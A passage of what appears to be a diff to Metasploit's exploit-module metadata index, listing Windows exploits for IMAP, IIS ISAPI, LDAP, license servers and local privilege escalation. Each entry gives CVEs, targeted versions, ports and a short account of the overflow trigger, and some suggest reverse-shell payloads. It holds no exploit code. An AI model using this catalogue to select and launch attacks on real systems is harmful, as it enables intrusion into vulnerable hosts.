"type": "exploit", - "author": [ - "MC " - ], - "description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the STATUS command. With proper\n credentials, this could allow for the execution of arbitrary\n code.", - "references": [ - "CVE-2005-2278", - "OSVDB-17844", - "BID-14243", - "URL-http://www.nessus.org/plugins/index.php?view=single&id=19193" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MailEnable 1.54 Pro Universal", - "Windows XP Pro SP0/SP1 English", - "Windows 2000 Pro English ALL", - "Windows 2003 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mailenable_status.rb", - "is_install_path": true, - "ref_name": "windows/imap/mailenable_status", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mailenable_w3c_select": { - "name": "MailEnable IMAPD W3C Logging Buffer Overflow", - "fullname": "exploit/windows/imap/mailenable_w3c_select", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-10-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. 
MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.", - "references": [ - "CVE-2005-3155", - "OSVDB-19842", - "BID-15006" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MailEnable 1.54 Pro Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mailenable_w3c_select.rb", - "is_install_path": true, - "ref_name": "windows/imap/mailenable_w3c_select", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mdaemon_cram_md5": { - "name": "Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow", - "fullname": "exploit/windows/imap/mdaemon_cram_md5", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-11-12", - "type": "exploit", - "author": [ - "Unknown" - ], - "description": "This module exploits a buffer overflow in the CRAM-MD5\n authentication of the MDaemon IMAP service. 
This\n vulnerability was discovered by Muts.", - "references": [ - "CVE-2004-1520", - "OSVDB-11838", - "BID-11675" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MDaemon IMAP 8.0.3 Windows XP SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mdaemon_cram_md5.rb", - "is_install_path": true, - "ref_name": "windows/imap/mdaemon_cram_md5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mdaemon_fetch": { - "name": "MDaemon 9.6.4 IMAPD FETCH Buffer Overflow", - "fullname": "exploit/windows/imap/mdaemon_fetch", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-03-13", - "type": "exploit", - "author": [ - "Jacopo Cervini", - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n account credentials are required. 
Credit to Matteo Memelli", - "references": [ - "CVE-2008-1358", - "OSVDB-43111", - "BID-28245", - "EDB-5248" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MDaemon Version 9.6.4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mdaemon_fetch.rb", - "is_install_path": true, - "ref_name": "windows/imap/mdaemon_fetch", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mercur_imap_select_overflow": { - "name": "Mercur v5.0 IMAP SP3 SELECT Buffer Overflow", - "fullname": "exploit/windows/imap/mercur_imap_select_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-03-17", - "type": "exploit", - "author": [ - "Jacopo Cervini " - ], - "description": "Mercur v5.0 IMAP server is prone to a remotely exploitable\n stack-based buffer overflow vulnerability. 
This issue is due\n to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.\n Credit to Tim Taylor for discover the vulnerability.", - "references": [ - "CVE-2006-1255", - "OSVDB-23950", - "BID-17138" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Server SP4 English", - "Windows 2000 Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mercur_imap_select_overflow.rb", - "is_install_path": true, - "ref_name": "windows/imap/mercur_imap_select_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mercur_login": { - "name": "Mercur Messaging 2005 IMAP Login Buffer Overflow", - "fullname": "exploit/windows/imap/mercur_login", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-03-17", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n Since the room for shellcode is small, using the reverse ordinal payloads\n yields the best results.", - "references": [ - "CVE-2006-1255", - "OSVDB-23950", - "BID-17138", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mercur_login.rb", - "is_install_path": true, - "ref_name": "windows/imap/mercur_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mercury_login": { - 
"name": "Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow", - "fullname": "exploit/windows/imap/mercury_login", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-03-06", - "type": "exploit", - "author": [ - "mu-b", - "MC ", - "Ivan Racic" - ], - "description": "This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n LOGIN verb. By sending a specially crafted login command, a buffer\n is corrupted, and code execution is possible. This vulnerability was\n discovered by (mu-b at digit-labs.org).", - "references": [ - "CVE-2007-1373", - "EDB-3418" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mercury_login.rb", - "is_install_path": true, - "ref_name": "windows/imap/mercury_login", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/mercury_rename": { - "name": "Mercury/32 v4.01a IMAP RENAME Buffer Overflow", - "fullname": "exploit/windows/imap/mercury_rename", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-11-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow vulnerability in the\n Mercury/32 v.4.01a IMAP service.", - "references": [ - "CVE-2004-1211", - "OSVDB-12508", - "BID-11775", - "URL-http://www.nessus.org/plugins/index.php?view=single&id=15867" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/mercury_rename.rb", - "is_install_path": true, - "ref_name": "windows/imap/mercury_rename", - 
"check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/novell_netmail_append": { - "name": "Novell NetMail IMAP APPEND Buffer Overflow", - "fullname": "exploit/windows/imap/novell_netmail_append", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-12-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", - "references": [ - "CVE-2006-6425", - "OSVDB-31362", - "BID-21723", - "ZDI-06-054" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/novell_netmail_append.rb", - "is_install_path": true, - "ref_name": "windows/imap/novell_netmail_append", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/novell_netmail_auth": { - "name": "Novell NetMail IMAP AUTHENTICATE Buffer Overflow", - "fullname": "exploit/windows/imap/novell_netmail_auth", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-01-07", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n GSSAPI command. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution. 
Using the PAYLOAD of windows/shell_bind_tcp\n or windows/shell_reverse_tcp allows for the most reliable results.", - "references": [ - "OSVDB-55175" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/novell_netmail_auth.rb", - "is_install_path": true, - "ref_name": "windows/imap/novell_netmail_auth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/novell_netmail_status": { - "name": "Novell NetMail IMAP STATUS Buffer Overflow", - "fullname": "exploit/windows/imap/novell_netmail_status", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-11-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS\n verb. 
By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", - "references": [ - "CVE-2005-3314", - "OSVDB-20956", - "BID-15491" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/novell_netmail_status.rb", - "is_install_path": true, - "ref_name": "windows/imap/novell_netmail_status", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/imap/novell_netmail_subscribe": { - "name": "Novell NetMail IMAP SUBSCRIBE Buffer Overflow", - "fullname": "exploit/windows/imap/novell_netmail_subscribe", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-12-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n verb. 
By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", - "references": [ - "CVE-2006-6761", - "OSVDB-31360", - "BID-21728", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454" - ], - "platform": "Windows", - "arch": "", - "rport": 143, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/imap/novell_netmail_subscribe.rb", - "is_install_path": true, - "ref_name": "windows/imap/novell_netmail_subscribe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/ms00_094_pbserver": { - "name": "MS00-094 Microsoft IIS Phone Book Service Overflow", - "fullname": "exploit/windows/isapi/ms00_094_pbserver", - "aliases": [], - "rank": 400, - "disclosure_date": "2000-12-04", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This is an exploit for the Phone Book Service /pbserver/pbserver.dll\n described in MS00-094. By sending an overly long URL argument\n for phone book updates, it is possible to overwrite the stack. 
This\n module has only been tested against Windows 2000 SP1.", - "references": [ - "CVE-2000-1089", - "OSVDB-463", - "BID-2048", - "MSB-MS00-094" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP1", - "Windows 2000 SP0", - "Windows NT SP6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/ms00_094_pbserver.rb", - "is_install_path": true, - "ref_name": "windows/isapi/ms00_094_pbserver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/ms03_022_nsiislog_post": { - "name": "MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow", - "fullname": "exploit/windows/isapi/ms03_022_nsiislog_post", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-06-25", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a buffer overflow found in the nsiislog.dll\n ISAPI filter that comes with Windows Media Server. This\n module will also work against the 'patched' MS03-019\n version. 
This vulnerability was addressed by MS03-022.", - "references": [ - "CVE-2003-0349", - "OSVDB-4535", - "BID-8035", - "MSB-MS03-022", - "URL-http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Brute Force", - "Windows 2000 -MS03-019", - "Windows 2000 +MS03-019", - "Windows XP -MS03-019" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb", - "is_install_path": true, - "ref_name": "windows/isapi/ms03_022_nsiislog_post", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/ms03_051_fp30reg_chunked": { - "name": "MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow", - "fullname": "exploit/windows/isapi/ms03_051_fp30reg_chunked", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-11-11", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This is an exploit for the chunked encoding buffer overflow\n described in MS03-051 and originally reported by Brett\n Moore. This particular modules works against versions of\n Windows 2000 between SP0 and SP3. 
Service Pack 4 fixes the\n issue.", - "references": [ - "CVE-2003-0822", - "OSVDB-2952", - "BID-9007", - "MSB-MS03-051" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP0-SP3", - "Windows 2000 07/22/02", - "Windows 2000 10/06/99" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb", - "is_install_path": true, - "ref_name": "windows/isapi/ms03_051_fp30reg_chunked", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/rsa_webagent_redirect": { - "name": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", - "fullname": "exploit/windows/isapi/rsa_webagent_redirect", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-10-21", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the SecurID Web\n Agent for IIS. 
This ISAPI filter runs in-process with\n inetinfo.exe, any attempt to exploit this flaw will result\n in the termination and potential restart of the IIS service.", - "references": [ - "CVE-2005-4734", - "OSVDB-20151" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "RSA WebAgent 5.2", - "RSA WebAgent 5.3", - "RSA WebAgent 5.2 on Windows 2000 English", - "RSA WebAgent 5.3 on Windows 2000 English", - "RSA WebAgent 5.2 on Windows XP SP0-SP1 English", - "RSA WebAgent 5.3 on Windows XP SP0-SP1 English", - "RSA WebAgent 5.2 on Windows XP SP2 English", - "RSA WebAgent 5.3 on Windows XP SP2 English", - "RSA WebAgent 5.2 on Windows 2003 English SP0", - "RSA WebAgent 5.3 on Windows 2003 English SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/rsa_webagent_redirect.rb", - "is_install_path": true, - "ref_name": "windows/isapi/rsa_webagent_redirect", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/isapi/w3who_query": { - "name": "Microsoft IIS ISAPI w3who.dll Query String Overflow", - "fullname": "exploit/windows/isapi/w3who_query", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-12-06", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the w3who.dll ISAPI\n application. This vulnerability was discovered Nicolas\n Gregoire and this code has been successfully tested against\n Windows 2000 and Windows XP (SP2). 
When exploiting Windows\n XP, the payload must call RevertToSelf before it will be\n able to spawn a command shell.", - "references": [ - "CVE-2004-1134", - "OSVDB-12258", - "URL-http://www.exaprobe.com/labs/advisories/esa-2004-1206.html", - "BID-11820" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Detection", - "Windows 2000 RESKIT DLL [Windows 2000]", - "Windows 2000 RESKIT DLL [Windows XP]" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/isapi/w3who_query.rb", - "is_install_path": true, - "ref_name": "windows/isapi/w3who_query", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ldap/imail_thc": { - "name": "IMail LDAP Service Buffer Overflow", - "fullname": "exploit/windows/ldap/imail_thc", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-02-17", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a buffer overflow in the LDAP service that is\n part of the IMail product. 
This module was tested against\n version 7.10 and 8.5, both running on Windows 2000.", - "references": [ - "CVE-2004-0297", - "OSVDB-3984", - "BID-9682", - "URL-http://web.archive.org/web/20060110155821/http://secunia.com:80/advisories/10880/" - ], - "platform": "Windows", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 English", - "Windows 2000 IMail 8.x" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/ldap/imail_thc.rb", - "is_install_path": true, - "ref_name": "windows/ldap/imail_thc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ldap/pgp_keyserver7": { - "name": "Network Associates PGP KeyServer 7 LDAP Buffer Overflow", - "fullname": "exploit/windows/ldap/pgp_keyserver7", - "aliases": [], - "rank": 400, - "disclosure_date": "2001-07-16", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the LDAP service that is\n part of the NAI PGP Enterprise product suite. This module was tested\n against PGP KeyServer v7.0. 
Due to space restrictions, egghunter is\n used to find our payload - therefore you may wish to adjust WfsDelay.", - "references": [ - "CVE-2001-1320", - "OSVDB-4742", - "BID-3046", - "URL-http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/" - ], - "platform": "Windows", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal PGPcertd.exe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ldap/pgp_keyserver7.rb", - "is_install_path": true, - "ref_name": "windows/ldap/pgp_keyserver7", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/license/calicclnt_getconfig": { - "name": "Computer Associates License Client GETCONFIG Overflow", - "fullname": "exploit/windows/license/calicclnt_getconfig", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-03-02", - "type": "exploit", - "author": [ - "hdm ", - "aushack " - ], - "description": "This module exploits a vulnerability in the CA License Client\n service. This exploit will only work if your IP address can be\n resolved from the target system point of view. This can be\n accomplished on a local network by running the 'nmbd' service\n that comes with Samba. If you are running this exploit from\n Windows and do not filter udp port 137, this should not be a\n problem (if the target is on the same network segment). Due to\n the bugginess of the software, you are only allowed one connection\n to the agent port before it starts ignoring you. 
If it wasn't for this\n issue, it would be possible to repeatedly exploit this bug.", - "references": [ - "CVE-2005-0581", - "OSVDB-14389", - "BID-12705", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213" - ], - "platform": "Windows", - "arch": "", - "rport": 10203, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 English", - "Windows XP English SP0-1", - "Windows XP English SP2", - "Windows 2003 English SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/license/calicclnt_getconfig.rb", - "is_install_path": true, - "ref_name": "windows/license/calicclnt_getconfig", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/license/calicserv_getconfig": { - "name": "Computer Associates License Server GETCONFIG Overflow", - "fullname": "exploit/windows/license/calicserv_getconfig", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-03-02", - "type": "exploit", - "author": [ - "hdm ", - "aushack " - ], - "description": "This module exploits an vulnerability in the CA License Server\n network service. 
By sending an excessively long GETCONFIG\n packet the stack may be overwritten.", - "references": [ - "CVE-2005-0581", - "OSVDB-14389", - "BID-12705", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213" - ], - "platform": "Windows", - "arch": "", - "rport": 10202, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 English", - "Windows XP English SP0-1", - "Windows XP English SP2", - "Windows 2003 English SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/license/calicserv_getconfig.rb", - "is_install_path": true, - "ref_name": "windows/license/calicserv_getconfig", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/license/flexnet_lmgrd_bof": { - "name": "FlexNet License Server Manager lmgrd Buffer Overflow", - "fullname": "exploit/windows/license/flexnet_lmgrd_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-23", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Alexander Gavrun", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a vulnerability in the FlexNet\n License Server Manager.\n\n The vulnerability is due to the insecure usage of memcpy\n in the lmgrd service when handling network packets, which\n results in a stack buffer overflow.\n\n In order to improve reliability, this module will make lots of\n connections to lmgrd during each attempt to maximize its success.", - "references": [ - "OSVDB-81899", - "BID-52718", - "ZDI-12-052", - "URL-http://aluigi.altervista.org/adv/lmgrd_1-adv.txt", - "URL-http://www.flexerasoftware.com/pl/13057.htm" - ], - "platform": "Windows", - "arch": "", - "rport": 27000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Debug", - "Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3", - "Alias License Tools 
10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3", - "Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/license/flexnet_lmgrd_bof.rb", - "is_install_path": true, - "ref_name": "windows/license/flexnet_lmgrd_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/license/sentinel_lm7_udp": { - "name": "SentinelLM UDP Buffer Overflow", - "fullname": "exploit/windows/license/sentinel_lm7_udp", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-03-07", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a simple stack buffer overflow in the Sentinel\n License Manager. The SentinelLM service is installed with a\n wide selection of products and seems particular popular with\n academic products. If the wrong target value is selected,\n the service will crash and not restart.", - "references": [ - "CVE-2005-0353", - "OSVDB-14605", - "BID-12742" - ], - "platform": "Windows", - "arch": "", - "rport": 5093, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6", - "SentinelLM 7.2.0.0 Windows 2000 English", - "SentinelLM 7.2.0.0 Windows 2000 German", - "SentinelLM 7.2.0.0 Windows XP English SP0/SP1", - "SentinelLM 7.2.0.0 Windows 2003 English SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/license/sentinel_lm7_udp.rb", - "is_install_path": true, - "ref_name": "windows/license/sentinel_lm7_udp", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/local/adobe_sandbox_adobecollabsync": { - "name": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass", - "fullname": 
"exploit/windows/local/adobe_sandbox_adobecollabsync", - "aliases": [], - "rank": 500, - "disclosure_date": "2013-05-14", - "type": "exploit", - "author": [ - "Felipe Andres Manzano", - "juan vazquez " - ], - "description": "This module exploits a vulnerability on Adobe Reader X Sandbox. The\n vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe\n process to write register values which can be used to trigger a buffer overflow on\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.", - "references": [ - "CVE-2013-2730", - "OSVDB-93355", - "URL-http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader X 10.1.4 / Windows 7 SP1" - ], - "mod_time": "2022-12-04 17:41:24 +0000", - "path": "/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb", - "is_install_path": true, - "ref_name": "windows/local/adobe_sandbox_adobecollabsync", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/agnitum_outpost_acs": { - "name": "Agnitum Outpost Internet Security Local Privilege Escalation", - "fullname": "exploit/windows/local/agnitum_outpost_acs", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-08-02", - "type": "exploit", - "author": [ - "Ahmad Moghimi", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability on Agnitum Outpost Internet\n Security 8.1. 
The vulnerability exists in the acs.exe component, allowing the user to load\n arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary\n code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with\n Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).", - "references": [ - "OSVDB-96208", - "EDB-27282" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Agnitum Outpost Internet Security 8.1" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/local/agnitum_outpost_acs.rb", - "is_install_path": true, - "ref_name": "windows/local/agnitum_outpost_acs", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/alpc_taskscheduler": { - "name": "Microsoft Windows ALPC Task Scheduler Local Privilege Elevation", - "fullname": "exploit/windows/local/alpc_taskscheduler", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-08-27", - "type": "exploit", - "author": [ - "SandboxEscaper", - "bwatters-r7", - "asoto-r7", - "Jacob Robles" - ], - "description": "On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented\n by the task scheduler service can be used to write arbitrary DACLs to `.job` files located\n in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this\n location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be\n created to a file the user has read access to. 
